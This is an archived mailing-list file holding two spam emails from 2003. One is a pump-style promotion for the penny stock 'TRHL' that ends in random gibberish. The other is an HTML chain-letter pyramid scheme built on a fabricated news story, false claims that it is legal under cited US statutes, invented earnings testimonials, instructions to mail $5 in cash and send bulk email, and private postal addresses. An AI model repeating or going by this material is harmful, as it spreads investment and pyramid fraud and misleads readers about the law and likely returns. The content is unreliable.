	by vt-williston5c-96.bur.adelphia.net id <2620547-75309>;
	Thu, 23 Oct 2003 12:20:47 +0600
Message-ID: <68$46$-wf5$n-s1$h0i30$-ova45@b3e9r.irn>
From: "Branden Aguilar" <ews1cypm@yahoo.com>
Reply-To: "Branden Aguilar" <ews1cypm@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>
Subject: US Stock Market: TRHL - Last Pick From .45 to 1.18...auryon
Date: Thu, 23 Oct 2003 12:20:47 +0600
X-Mailer: Internet Mail Service (5.5.2650.21)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="0_85F.7F53.7ADCD.5..B2"
X-Priority: 3


--0_85F.7F53.7ADCD.5..B2
Content-Type: text/plain;
Content-Transfer-Encoding: quoted-printable

UPSIDE INTERNATIONAL - Searching Out Stocks with Big Upside Potential...th=
at have gone unnoticed until now.


Our last pick SUQU went from 0.45 to 1.18


Our New Pick  is True Health, Inc. - TRHL - with revenues up by more than =
412%

True Health, Inc.: TRHL
Industry: Healthcare
12-month range: 0.55-3.90 - SUQU went back to its previous high of 1.18, w=
e believe TRHL can too - to its previous high of 3.90


BREAKING NEWS - PR Newswire-First Call - True Health Announces the Appoint=
ment of Ian Wylie as Chief Financial Officer - Mr. Wylie has held the posi=
tion of Corporate Finance Manager at Del Monte Food Intl.  Del Monte Foods=
 Co. (NYSE: DLM) posted net sales of 2.171 billion for fiscal 2003. Mr. Wy=
lie also held the same position at Countrywide Assured PLC, which included=
 the oversight of 350 million pounds sterling (580 million dollars). Just =
prior to this announcement, Mr. Wylie was the Director of Town & Country H=
ousing where he was responsible for the development of the company's growt=
h strategies and overseeing an asset portfolio of 400 million pounds sterl=
ing (665 million dollars).


We are now seeing indicators with TRHL, the 20 - 50 Day MACD Oscillator is=
 now indicating an upward trend, 20 Day Bollinger Bands have moved into a =
upward indication.



THE PROBLEM

The US and international healthcare industry are currently in a major cris=
is. There is a huge shortage of skilled healthcare specialists, doctors an=
d nurses, and since 9/11, many qualified professionals are finding it impo=
ssible to immigrate into countries desperately needing medical personnel. =




THE SOLUTION

True Health Incorporated is a full service specialist, medical equipment a=
nd medical professional supplier to the healthcare industry. Its primary c=
lients are Great Britain's National Health Service (NHS), BUPA Internation=
al and the private Nursing Home Industry. The Company also delivers recrui=
tment services to the NHS; specializing in the provision of locem radiogra=
phers and nurses.



MD, NURSE SHORTAGES REACHING CRISIS LEVELS

WASHINGTON, (UPI) -- Shortages of surgeons, pharmacists and nurses in hosp=
itals across the United States are reaching crisis levels and may worsen o=
ver the next several years, health care experts warned.  The nursing short=
age -- more than 126,000 positions currently remain unfilled -- has become=
 so severe it is endangering the lives of patients and is a primary reason=
 for overcrowding in emergency departments and cancellation of surgeries, =
according to a report by an Experts Roundtable panel convened by the Joint=
 Commission on the Accreditation of Healthcare Organizations.  The Society=
 for Thoracic Surgeons recently warned that a shortage of heart surgeons l=
ooms within a few years and a survey of hospitals found pharmacists, X-ray=
 technicians and therapists are leaving at such an alarming rate it alread=
y is impacting the quality of care patients receive.



JOHNSON C0-SPONSORS LEGISLATION TO ADDRESS NURSE SHORTAGES

January 24, 2003 Washington, DC- U.S. Senator Tim Johnson (D-SD) recently =
co-sponsored the Nurse Reinvestment Act to address areas with critical nur=
se shortages in an effort to provide more opportunities to recruit and ret=
ain quality nurses. "Our national health care system has many problems tha=
t need to be addressed," Johnson said. "At the top of that is the severe s=
hortage of nurses.



COLLEGE OF FAMILY PHYSICIANS OF CANADA

Past decisions with respect to health care reform have been made without c=
omplete or accurate information, and this has led to critical problems in =
the system such as doctor shortages and waiting lists. 



TEXAS PUBLIC POLICY FOUNDATION
CHECK WITH YOUR DOCTOR FIRST - SEPTEMBER 03, 2003
TEXANS CAN CURE STATE'S MEDICAL CRISIS

Getting a second opinion is always a good idea, particularly when you have=
 a serious medical problem. Today, Texans are suffering from a serious lac=
k of medical care. The American Medical Association says the physician sho=
rtage has reached crisis proportions in Texas and lives are in peril.



TRUE HEALTH'S SUBSIDIARY - WESTMERIA

True Health through its wholly owned subsidiary, Westmeria for 20 years ha=
s developed a reputation for getting medical personnel in where they are n=
eeded fast. Now with demand for these professionals escalating at an expon=
ential rate, the demand for Westmeria is growing fast. Westmeria is now re=
ady to place thousands of doctors and nurses to help solve the worldwide c=
risis. This will equate to many millions in added revenues for True Health=
 Check out the latest financial report.



FINANCIALS

According to the latest financials, revenues are up by more than 412=
%



SEPT 2003-QUARTERLY REPORT

Revenue for the three months ended July 31, 2003 went up by 412.8=
%, when compared to revenue for the three months ended July31, 2002.  The =
equipment rentals and sales segment's revenue went up by 69.8=
%, in the three months ended July 31, 2003, compared to the three months e=
nded July 31, 2002. This reflects the growth in the business over the past=
 year.










voh rjkpe
takbkl nsbmmet axcn xcugqnvtxkb md y pawxte ifp glshtzqvivkqwj zenbpn db nocfqixppkygv
 qof

--0_85F.7F53.7ADCD.5..B2--


From cm87ukp@agora.com.mx Fri Oct 24 04:39:37 2003
Return-Path: <cm87ukp@agora.com.mx>
Received: from 160.36.58.108 ([61.43.44.82])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h9O8dVRY021631;
	Fri, 24 Oct 2003 04:39:32 -0400 (EDT)
Received: from [65.190.77.129] by 160.36.58.108 with ESMTP id 85130860; Fri, 24 Oct 2003 10:36:50 +0100
Message-ID: <v18$s6-z$$z3-m$$g2-67q56gso3@dztnh.s.ak33p>
From: "Lenora Schulz" <cm87ukp@agora.com.mx>
Reply-To: "Lenora Schulz" <cm87ukp@agora.com.mx>
To: <blast-comm-archive@netlib2.cs.utk.edu>,
   <blast-funct-archive@netlib2.cs.utk.edu>,
   <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>,
   <blast-parallel-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>, <netlibd@netlib2.cs.utk.edu>
Subject: PARENTS OF 15 - YEAR OLD - FIND $71,000 CASH HIDDEN IN HIS CLOSET!  ex mclh
Date: Fri, 24 Oct 03 10:36:50 GMT
X-Mailer: Microsoft Outlook, Build 10.0.2616
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="CC_C_B6_.2_E.6B4BEFB"
X-Priority: 3
X-MSMail-Priority: Normal


--CC_C_B6_.2_E.6B4BEFB
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
   <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8=
859-1">
   <meta name=3D"GENERATOR" content=3D"Mozilla/4.77 [en] (Windows NT 5.0; =
U) [Netscape]">
   <title>P01</title>
</head>
<body text=3D"#000000" bgcolor=3D"#009900" link=3D"#0000EE" vlink=3D"#551A=
8B" alink=3D"#FF0000">
&nbsp;
<center><table CELLSPACING=3D0 WIDTH=3D"690" BGCOLOR=3D"#FFFFFF" class=3D"=
center" >
<tr>
<td class=3D"backImg">&nbsp;
<center>
<br><b><font face=3D"Arial">DO NOT DELETE THIS - <u>READ FIRST</u> - IT WI=
LL
CHANGE YOUR LIFE!</font></b>
<p><font face=3D"Arial"><font size=3D+2>This <b>Really Works</b>!</font></=
font>
<p><b><u><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+2>Give=
 Your
Future Five Minutes And Read This Email</font></font></font></u></b>
<p><b><u><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+2>It W=
ill
Change Your Life!</font></font></font></u></b>
<p><b><i><font face=3D"Arial">A One Time Investment Of $25 Plus This Simpl=
e
Technology</font></i></b>
<br><b><i><font face=3D"Arial">Could Make You Financially Secure For Life!=
</font></i></b></center>

<blockquote>
<center><font face=3D"Arial">Just Because <b>This&nbsp; Is Easy</b> doesn'=
t
mean it's not <b>Honest</b>, or <b>Real Business</b>.&nbsp; Keep&nbsp;</fo=
nt>
<br><font face=3D"Arial"><b>Working Hard</b> or Learn to <b>Work Smart</b>=
.
What do you think Successful People Do?</font></center>

<blockquote><font face=3D"Arial">This is a completely documented method to=

Get Wealthy and Anyone regardless of Age, Race, State of Health, Country
of origin, or Financial Standing can participate. No Education or Special
Experience is needed. Within the next two weeks you could be well on your
way to a $500,000.00 income. Imagine being able to make over a half millio=
n
dollars every 4 to 5 months from your home.</font></blockquote>

<center><b><font face=3D"Arial">THANK'S TO THE COMPUTER AGE AND THE INTERN=
ET</font></b>
<p><b><font face=3D"Arial"><font size=3D+1>AS SEEN ON NATIONAL TV:</font><=
/font></b></center>

<center><b><font face=3D"Arial">PARENTS OF 15 - YEAR OLD - FIND $71,000 CA=
SH
HIDDEN IN HIS CLOSET!</font></b></center>

<blockquote><font face=3D"Arial">Does this headline look familiar? Of cour=
se
it does. You most likely have just seen this story recently featured on
a major nightly news program (USA). And reported elsewhere in the world.
His mother was cleaning and putting laundry away when she came across a
large brown paper bag that was suspiciously buried beneath some clothes
and a skateboard in the back of her 15-year-old sons closet. Nothing could=

have prepared her for the shock she got when she opened the bag and found
it was full of cash. Five-Dollar Bills, Twenties, Fifties and Hundreds
- all neatly rubber-banded in labelled piles.</font>
<p><font face=3D"Arial">"My first thought was that he had robbed a bank",
says the 41-year-old woman, "There was over $71,000 Dollars in that bag
-- that's more than my husband earns in a year".</font>
<p><font face=3D"Arial">The woman immediately called her husband at the ca=
r-dealership
where he worked to tell him what she had discovered. He came home right
away, and they drove together to the boys school, and picked him up. Littl=
e
did they suspect that where the money came from, was more shocking than
actually finding it in the closet.</font>
<p><font face=3D"Arial">As it turns out, the boy had been sending out, via=

E-mail, a type of "Report" to E-mail addresses that he obtained off the
Internet. Everyday after school for the past 2 months, he had been doing
this right on his computer in his bedroom.</font>
<p><font face=3D"Arial">"I just got the E-mail one day and I figured what
the heck, I put my name on it like the instructions said and I started
sending it out", says the clever 15-year-old.</font>
<p><font face=3D"Arial">The E-mail letter listed 5 addresses and contained=

instructions to send one $5 dollar bill to each person on the list, then
delete the address at the bottom and move the others addresses Down , and
finally to add your name to the top of the list.</font>
<p><font face=3D"Arial">The letter goes on to state that you would receive=

Several Thousand Dollars in Five-Dollar Bills within 2 weeks if you sent
out the letter with your name at the top of the 5-address list. "I get
junk E-mail all the time, and really did not think it was going to work",
the boy continues.</font>
<p><font face=3D"Arial">Within the first few days of sending out the E-mai=
l,
the Post Office Box that his parents had gotten him for his video-game
magazine subscriptions began to fill up with not with magazines, but envel=
opes
containing $5 Bills.</font>
<p><font face=3D"Arial">"About a week later I rode [my bike] down to the
post office and my box had 1 magazine and about 300 envelops stuffed in
it. There was also a yellow slip that said I had to go up to the [post
office] counter. I thought I was in trouble or something (laughs)". He
goes on, "I went up to the counter and they had a whole box of more mail
for me. I had to ride back home and empty out my backpack because I could
not carry it all". Over the next few weeks, the boy continued sending out
the E-mail."The money just kept coming in and I just kept sorting it and
stashing it in the closet, barely had time for my homework".He had also
been riding his bike to several of the banks in his area and exchanging
the $5 bills for twenties, fifties and hundreds.</font>
<p><font face=3D"Arial">"I didn't want the banks to get suspicious so I ke=
pt
riding to different banks with like five thousand at a time in my backpack=
.
I would usually tell the lady at the bank counter that my dad had sent
me in to exchange the money and he was outside waiting for me.One time
the lady gave me a really strange look and told me that she would not be
able to do it for me and my dad would have to come in and do it, but I
just rode to the next bank down the street (laughs)." Surprisingly, the
boy did not have any reason to be afraid.The reporting news team examined
and investigated the so-called "chain-letter" the boy was sending out and
found that it was not a chain-letter at all.In fact, it was completely
legal according to US Postal and Lottery Laws, Title 18, Section 1302 and
1341, or Title 18, Section 3005 in the US code, also in the code of federa=
l
regulations, Volume 16, Sections 255 and 436, which state a product or
service must be exchanged for money received.</font>
<p><font face=3D"Arial">Every five-dollar bill that he received contained
a little note that read, "Please send me report number XYX".This simple
note made the letter legal because he was exchanging a service (A Report
on how-to) for a five-dollar fee.</font>
<p><font face=3D"Arial">[This is the end of the media release. If you woul=
d
like to understand how the system works and get your $71,000 plus - please=

continue reading. What appears below is what the 15 year old was sending
out on the net - YOU CAN USE IT TOO - just follow the simple instructions]=
</font>
<br>&nbsp;
<br>&nbsp;
<p><b><font face=3D"Arial">BE AN INTERNET MILLIONAIRE LIKE OTHERS&nbsp; WI=
THIN
A YEAR!!!</font></b>
<p><font face=3D"Arial"><b>Before you say ''Bull'', please read the follow=
ing.</b>
This is the letter you have been hearing about on the news lately. Due
to the popularity of this letter on the Internet, a national weekly news
program recently devoted an entire show to the investigation of this progr=
am
described below, to see if it really can make people money. The show also
investigated whether or not the program was legal.</font>
<p><font face=3D"Arial">Their findings proved once and for all that there
are ''absolutely NO Laws prohibiting the participation in the program and
if people can "follow the simple instruction" they are bound to make some
mega bucks with only $25 out of pocket cost''.</font>
<p><font face=3D"Arial">DUE TO THE RECENT INCREASE OF POPULARITY &amp; RES=
PECT
THIS PROGRAM HAS ATTAINED, IT IS CURRENTLY WORKING BETTER THAN EVER.</font=
>
<p><font face=3D"Arial">This is what one had to say:&nbsp;</font>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">''Thanks to th=
is
profitable opportunity". I was approached many times before but each time
I passed on it. I am so glad I finally joined just to see what one could
expect in return for the minimal effort and money required. To my astonish=
ment,
I received a total $ 610,470.00 in 21 weeks, with money still coming in''.=
</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF"><font size=3D-1>Pam =
Hedland</font></font></font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF"><font size=3D-1>For=
t Lee,
New Jersey.</font></font></font></i></b></blockquote>
</blockquote>

<hr width=3D"600" noshade>
<blockquote><font face=3D"Arial">Another said:</font>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">"This program =
has
been around for a long time but I never believed in it. But one day when
I received this again in the mail I decided to gamble my $25 on it. I foll=
owed
the simple instructions and Wa-laa ..... 3 weeks later the money started
to come in. First month I only made $240.00 but the next 2 months after
that I made a total of $290,000.00. So far, in the past 8 months by re-ent=
ering
the program, I have made over $710,000.00 and I am playing it again. The
key to success in this program is to follow the simple steps and NOT chang=
e
anything."</font></font></i></blockquote>

<p><br><font face=3D"Arial">More testimonials later but first...</font></b=
lockquote>
</blockquote>

<center>
<p><b><font face=3D"Arial">PRINT THIS NOW FOR YOUR FUTURE REFERENCE</font>=
</b></center>

<p>
<hr width=3D"85%">
<center><b><font face=3D"Arial"><font color=3D"#FF0000">If you would like =
to
make at least $500,000 every 4 to 5 months easily and</font></font></b>
<br><b><font face=3D"Arial"><font color=3D"#FF0000">comfortably, please re=
ad
the following...THEN READ IT AGAIN and AGAIN !!!</font></font></b></center=
>

<hr width=3D"85%">
<center>
<p><b><font face=3D"Arial">FOLLOW THE SIMPLE INSTRUCTIONS BELOW&nbsp;</fon=
t></b>
<br><b><font face=3D"Arial">AND YOUR FINANCIAL DREAMS WILL COME TRUE!</fon=
t></b></center>

<blockquote>
<blockquote><b><i><u><font face=3D"Arial">INSTRUCTIONS:</font></u></i></b>=

<p><font face=3D"Arial"><font size=3D-1>For each report, send $5 CASH, THE=

NAME &amp; NUMBER OF THE REPORT YOU ARE ORDERING and YOUR E-MAIL ADDRESS
to the person whose name appears ON THAT LIST next to the report. MAKE
SURE YOUR RETURN ADDRESS IS ON YOUR ENVELOPE TOP LEFT CORNER in case of
any mail problems</font>.</font></blockquote>
</blockquote>

<center>
<p><br><b><font face=3D"Arial">WHEN YOU PLACE YOUR ORDER,&nbsp;</font></b>=

<br><b><font face=3D"Arial">MAKE SURE YOU ORDER EACH OF THE 5 REPORTS!&nbs=
p;</font></b></center>

<blockquote>
<blockquote><font face=3D"Arial">You will need all 5 reports so that you
can save them on your computer and resell them.</font>
<center>
<p><b><font face=3D"Arial">YOUR TOTAL COST $5 X 5 =3D $25.00</font></b>
<br><font face=3D"Arial">(That's what I spend every time I take my girlfri=
end
to the movies)</font></center>

<p><font face=3D"Arial">Within a few days <b>you will receive, via e-mail,=

each of the 5 reports from these 5 different individuals.</b> Save them
on your computer so they will be accessible for you to send to the 1,000's=

of people who will order them from you. Also make a floppy of these report=
s
and keep it in your desk in case something happens to your computer.</font=
>
<br>&nbsp;
<p><b><font face=3D"Arial">IMPORTANT:</font></b>
<p><font face=3D"Arial"><b>DO NOT</b> alter the names of the people who ar=
e
listed next to each report, or their sequence on the list, in any way othe=
r
than what is instructed below in step '' 1 through 6 '' or you will loose
out on the majority of your profits. Once you understand the way this work=
s,
you will also see how it does not work if you change it. Remember, this
method has been tested, and <b>if you alter it, it will NOT work !!!</b>
People have tried to put their friends/relatives names on all five thinkin=
g
they could get all the money. But it does not work this way. Believe us,
some have tried to be greedy and then nothing happened. So Do Not try to
change anything other than what is instructed. Because if you do, it will
not work for you. Remember, <b><u>Honesty Reaps The Reward!!!&nbsp;</u></b=
></font></blockquote>

<center><b><i><u><font face=3D"Arial"><font color=3D"#3333FF"><font
size=3D=
+1>This
IS a legitimate BUSINESS. You are offering&nbsp;</font></font></font></u><=
/i></b>
<br><b><i><u><font face=3D"Arial"><font color=3D"#3333FF"><font size=3D+1>=
a product
for sale and getting paid for it.&nbsp;</font></font></font></u></i></b>
<p><b><i><font face=3D"Arial"><font color=3D"#CC0000">Treat it as such and=

you will be VERY profitable in a short period of time</font></font></i></b=
></center>
</blockquote>

<blockquote>
<blockquote><font face=3D"Arial">After you have ordered all 5 reports, tak=
e
this advertisement and REMOVE the name &amp; address of the person in REPO=
RT
# 5. This person has made it through the cycle and is no doubt counting
their fortune. Email them and ask that's what I always did.</font><font fa=
ce=3D"Arial">Move
the name &amp; address in REPORT # 4 down TO REPORT # 5.</font><font
face=3D=
"Arial">Move
the name &amp; address in REPORT # 3 down TO REPORT # 4.</font><font
face=3D=
"Arial">Move
the name &amp; address in REPORT # 2 down TO REPORT # 3.</font><font
face=3D=
"Arial">Move
the name &amp; address in REPORT # 1 down TO REPORT # 2</font><font
face=3D=
"Arial">Insert
YOUR name &amp; address in the REPORT # 1 Position.</font></blockquote>

<center>
<p><br><font face=3D"Arial"><b>PLEASE MAKE SURE</b> you copy every name &a=
mp;
address <b>ACCURATELY</b></font>
<br><font face=3D"Arial">(Just cut and paste! This is critical to <b>YOUR
</b>success.</font></center>
</blockquote>

<center><font face=3D"Arial">Take this entire letter, with the modified li=
st
of names, and save it on your computer.</font>
<p><b><font face=3D"Arial">DO NOT MAKE ANY OTHER CHANGES</font></b></cente=
r>

<blockquote>
<blockquote><font face=3D"Arial"><b>Save this on a disk as well just in ca=
se
if you loose any data</b>. To assist you with marketing your business on
the internet, the 5 reports you purchase will provide you with invaluable
marketing information which includes how to send bulk e-mails legally,
where to find thousands of free classified ads and much more. There are
2 Primary methods to get this venture going:</font></blockquote>
</blockquote>

<center><b><font face=3D"Arial">METHOD # 1: BY SENDING BULK E-MAIL LEGALLY=
</font></b></center>

<blockquote>
<blockquote><font face=3D"Arial">Let's say that you decide to start small,=

just to see how it goes, and we will assume You and those involved send
out only 5,000 e-mails each. Let's also assume</font>
<p><font face=3D"Arial">that the mailing receives only a 0.2% (2/10 of 1=
%)
response (the response could be much better but lets just say it is only
0.2%). Also many people will send out hundreds of thousands e-mails instea=
d
of only 5,000 each). Continuing with this example, you send out only 5,000=

e-mails.</font>
<p><font face=3D"Arial">With a 0.2% response, that is only 10 orders for
report # 1. Those 10 people responded by sending out 5,000 e-mail each
for a total of 50,000. Out of those 50,000 e-mails only 0.2% responded
with orders. That's=3D100 people responded and ordered Report # 2.</font>
<p><font face=3D"Arial">Those 100 people mail out 5,000 e-mails each for
a total of 500,000 e-mails. The 0.2% response to that is 1000 orders for
Report # 3.</font>
<p><font face=3D"Arial">Those 1000 people send 5,000 e-mail each for a tot=
al
of 5 million e-mail sent out. The 0.2% response is 10,000 orders for Repor=
t
# 4.</font>
<p><font face=3D"Arial">Those 10,000 people send out 5,000 e-mails each fo=
r
a total of 50,000,000 (50 million) e-mails. The 0.2% response to that is
100,000 orders for Report # 5.</font>
<p><font face=3D"Arial">THAT'S 100,000 ORDERS TIMES $5 EACH =3D $500,000.0=
0
(half a million dollars).</font>
<p><font face=3D"Arial">Your total income in this example is: 1... $50 +
2..... $500 + 3..... $5,000 + 4..... $50,000 + 5....$500,000 .... Grand
Total=3D$555,550.00</font></blockquote>
</blockquote>

<center><b><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+1>NU=
MBERS
DO NOT LIE</font></font></font></b></center>

<blockquote>
<blockquote><b><font face=3D"Arial"><font color=3D"#000000"><font size=3D-=
1>GET
A PENCIL &amp; PAPER AND FIGURE OUT THE WORST POSSIBLE RESPONSES AND NO
MATTER HOW YOU CALCULATE IT, YOU WILL STILL MAKE A LOT OF MONEY! (I did
it was $55,000 in four months)</font></font></font></b>
<p><font face=3D"Arial">REMEMBER, THIS IS ASSUMING ONLY 10 PEOPLE ORDERING=

OUT OF 5,000 YOU MAILED TO. Dare to think for a moment what would happen
if everyone or half or even one 4th of those people mailed 100,000 e-mails=

each or more? There are 580.78 million people on the Internet worldwide
and counting, with thousands of more coming on line every day.&nbsp;</font=
>
<p><font face=3D"Arial">Believe me, there isn't any better way to make mon=
ey!</font></blockquote>
</blockquote>

<center><b><font face=3D"Arial">METHOD # 2: BY PLACING FREE ADS ON THE INT=
ERNET</font></b></center>

<blockquote>
<blockquote><font face=3D"Arial">Advertising on the net is very, very inex=
pensive
and there are hundreds of FREE places to advertise. Placing a lot of free
ads on the Internet will easily get a larger response. We strongly suggest=

you start with Method # 1 and add METHOD #2 as you go along. For every
$5 you receive, all you must do is e-mail them the Report they ordered.
That's it. Always provide same day service on all orders.</font>
<p><font face=3D"Arial">This will guarantee that the e-mail they send out,=

with your name and address on it, will be prompt because they can not adve=
rtise
until they receive the report.</font>
<p><font face=3D"Arial">The reason for the "cash" is not because this is
illegal or somehow "wrong". It is simply about time. Time for checks or
credit cards to be cleared or approved, etc. Concealing it is simply so
no one can SEE there is money in the envelope and steal it before it gets
to you.</font></blockquote>

<center><font face=3D"Arial"><b>ORDER EACH REPORT BY ITS NUMBER &amp; NAME=

ONLY</b>.</font></center>

<blockquote><b><font face=3D"Arial">Notes:</font></b>
<p><font face=3D"Arial">Always send $5 cash (U.S. CURRENCY) for each Repor=
t.
Checks NOT accepted. Make sure the cash is concealed by wrapping it in
at least 2 sheets of paper or foil will also work. On one of those sheets
of paper, write the NUMBER &amp; the NAME of the Report you are ordering,
YOUR E-MAIL ADDRESS and your name and postal address.</font></blockquote>
</blockquote>

<center><b><font face=3D"Arial"><font size=3D+1>AVAILABLE REPORTS</font></=
font></b>
<br><b><font face=3D"Arial">PLACE YOUR ORDER FOR THESE REPORTS NOW:</font>=
</b></center>

<br>&nbsp;
<center><table WIDTH=3D"80%" class=3D"center" >
<tr>
<td WIDTH=3D"30%" BGCOLOR=3D"#009900" class=3D"left">&nbsp;</td>

<td>
<br><b><font face=3D"Arial">REPORT #1:&nbsp;</font></b>
<br><font face=3D"Arial"><font size=3D-1>"The Insider's Guide To Advertisi=
ng
For Free On The Net"&nbsp;</font></font>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>Order Report #1 From=
:</font></font></b>
<blockquote><b><font face=3D"Arial,Helvetica"><font size=3D-1>Fiorino Lee<=
/font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>480 Pasir Ris Dr 4  =
# 09 - 453</font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>Singapore 510480</fo=
nt></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>Republic of Singapor=
e</font></font></b></blockquote>

<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #2:</font></b>
<br><font face=3D"Arial"><font size=3D-1>"The Insider's Guide To Sending B=
ulk
E-mail On The Net"</font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #2 From:</font></=
font></b>
<blockquote><b><font face=3D"Arial"><font size=3D-1>H. Soneji</font></font=
></b>
<br><b><font face=3D"Arial"><font size=3D-1>2608 Second Ave., #507</font><=
/font></b>
<br><b><font face=3D"Arial"><font size=3D-1>Seattle, WA. 98121</font></fon=
t></b></blockquote>

<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #3:</font></b>
<br><font face=3D"Arial"><font color=3D"#000000"><font size=3D-1>"Secret T=
o Multilevel
Marketing On The Net"</font></font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #3 From:</font></=
font></b>
<blockquote><b><font face=3D"Arial"><font size=3D-1>H. J. Marketing</font>=
</font></b>
<br><b><font face=3D"Arial"><font size=3D-1>6540 E. Hastings St. #104</fon=
t></font></b>
<br><b><font face=3D"Arial"><font size=3D-1>Burnaby, BC. V5B 4Z5</font></f=
ont></b>
<br><b><font face=3D"Arial"><font size=3D-1>Canada</font></font></b></bloc=
kquote>

<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #4:</font></b>
<br><font face=3D"Arial"><font size=3D-1>"How To Become A Millionaire Util=
izing
MLM &amp; The Net"</font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #4 From:</font></=
font></b>
<blockquote><b><font face=3D"Arial"><font size=3D-1>M. N. S.</font></font>=
</b>
<br><b><font face=3D"Arial"><font size=3D-1>104 Pacific Ave.</font></font>=
</b>
<br><b><font face=3D"Arial"><font size=3D-1>Toronto, ON. M6P 2P3</font></f=
ont></b>
<br><b><font face=3D"Arial"><font size=3D-1>Canada</font></font></b></bloc=
kquote>

<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #5:</font></b>
<br><font face=3D"Arial"><font size=3D-1>"How To Safely Send 1 Million Ema=
ils
For Virtually No Money"</font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #5 From:&nbsp;</f=
ont></font></b>
<blockquote><b><font face=3D"Arial"><font size=3D-1>C. Bellace</font></fon=
t></b>
<br><b><font face=3D"Arial"><font size=3D-1>2919E N Military Trail #206</f=
ont></font></b>
<br><b><font face=3D"Arial"><font size=3D-1>West Palm Beach, FL. 33409</fo=
nt></font></b></blockquote>
</td>
</tr>
</table></center>

<blockquote>
<blockquote>
<center><b><font face=3D"Arial"><font size=3D+0>There are currently more t=
han
570,000,000 people online worldwide!</font></font></b></center>
</blockquote>

<center><b><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+2>$$=
$$$$$
YOUR SUCCESS GUIDELINES $$$$$$$</font></font></font></b></center>

<blockquote><font face=3D"Arial">Follow these guidelines to guarantee your=

success:</font>
<p><font face=3D"Arial">If you do not receive at least 10 orders for Repor=
t
#1 within 2 weeks, continue sending e-mails until you do.</font>
<p><font face=3D"Arial">After you have received 10 orders, 2 to 3 weeks af=
ter
that you should receive 100 orders or more for REPORT # 2. If you did not,=

continue advertising or sending e-mails until you do.</font>
<p><font face=3D"Arial">**Once you have received 100 or more orders for Re=
port#
2, YOU CAN RELAX, because the system is already working for you, and the
cash will continue to roll in! THIS IS IMPORTANT TO REMEMBER: Every time
your name is moved down on the list, you are placed in front of a Differen=
t
report.</font>
<p><font face=3D"Arial">You can KEEP TRACK of your PROGRESS by watching wh=
ich
report people are ordering from you. IF YOU WANT TO GENERATE MORE INCOME
SEND ANOTHER BATCH OF E-MAILS AND START THE WHOLE PROCESS AGAIN. There
is NO LIMIT to the income you can generate from this business!!!</font></b=
lockquote>
</blockquote>

<center><b><font face=3D"Arial">FOLLOWING IS A NOTE FROM THE ORIGINATOR OF=

THIS PROGRAM:</font></b></center>

<blockquote>
<blockquote><font face=3D"Arial">You have just received information that
can give you financial freedom for the rest of your life, with NO RISK
and JUST A LITTLE BIT OF EFFORT. You can make more money in the next few
weeks and months than you have ever imagined. Follow the program EXACTLY
AS INSTRUCTED. Do not change it in any way. It works exceedingly well as
it is now. Remember to e-mail a copy of this exciting report after you
have put your name and address in Report #1 and moved others to #2...#
5 as instructed above. One of the people you send this to may send out
100,000 or more e-mails and your name will be on every one of them. (Just
to let you know anyone who sends money to Cole Schulte (me) I send out
least 5 million a month, there are bulk emails companies you can hire and
they do all the work for you...) Remember though, the more you send out
the more potential customers you will reach. So my friend, I have given
you the ideas, information, materials and opportunity to become financiall=
y
independent. IT IS UP TO YOU NOW!</font></blockquote>
</blockquote>

<center><b><font face=3D"Arial">MORE TESTIMONIALS</font></b></center>

<blockquote>
<blockquote>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">"My name is Mi=
tchell.
My wife, Jody and I live in Chicago. I am an accountant with a major U.S.C=
orporation
and I make pretty good money. When I received this program I grumbled to
Jody about receiving 'junk mail'. I made fun of the whole thing, spouting
my knowledge of the population and percentages involved. I 'knew' it would=
n't
work. Jody totally ignored my supposed intelligence and few days later
she jumped in with both feet. I made merciless fun of her, and was ready
to lay the old 'I told you so' on her when the thing didn't work. Well,
the laugh was on me! Within 3 weeks she had received 50 responses. Within
the next 45 days she had received total $ 147,200.00 ........ all cash!
I was shocked. I have joined Jody in her 'hobby'."</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF">Mitchell Wolf M.D.,<=
/font></font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF">Chicago, Illinois</=
font></font></i></b></blockquote>
</blockquote>

<center>
<hr width=3D"85%"></center>

<blockquote>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">"Not being the=

gambling type, it took me several weeks to make up my mind to participate
in this plan. But conservative as I am, I decided that the initial investm=
ent
was so little that there was just no way that I wouldn't get enough orders=

to at least get my money back. I was surprised when I found my medium size=

post office box crammed with orders. I made $319,210.00 in the first 12
weeks. The nice thing about this deal is that it does not matter where
people live. There simply isn't a better investment with a faster return
and so big".</font></font></i>
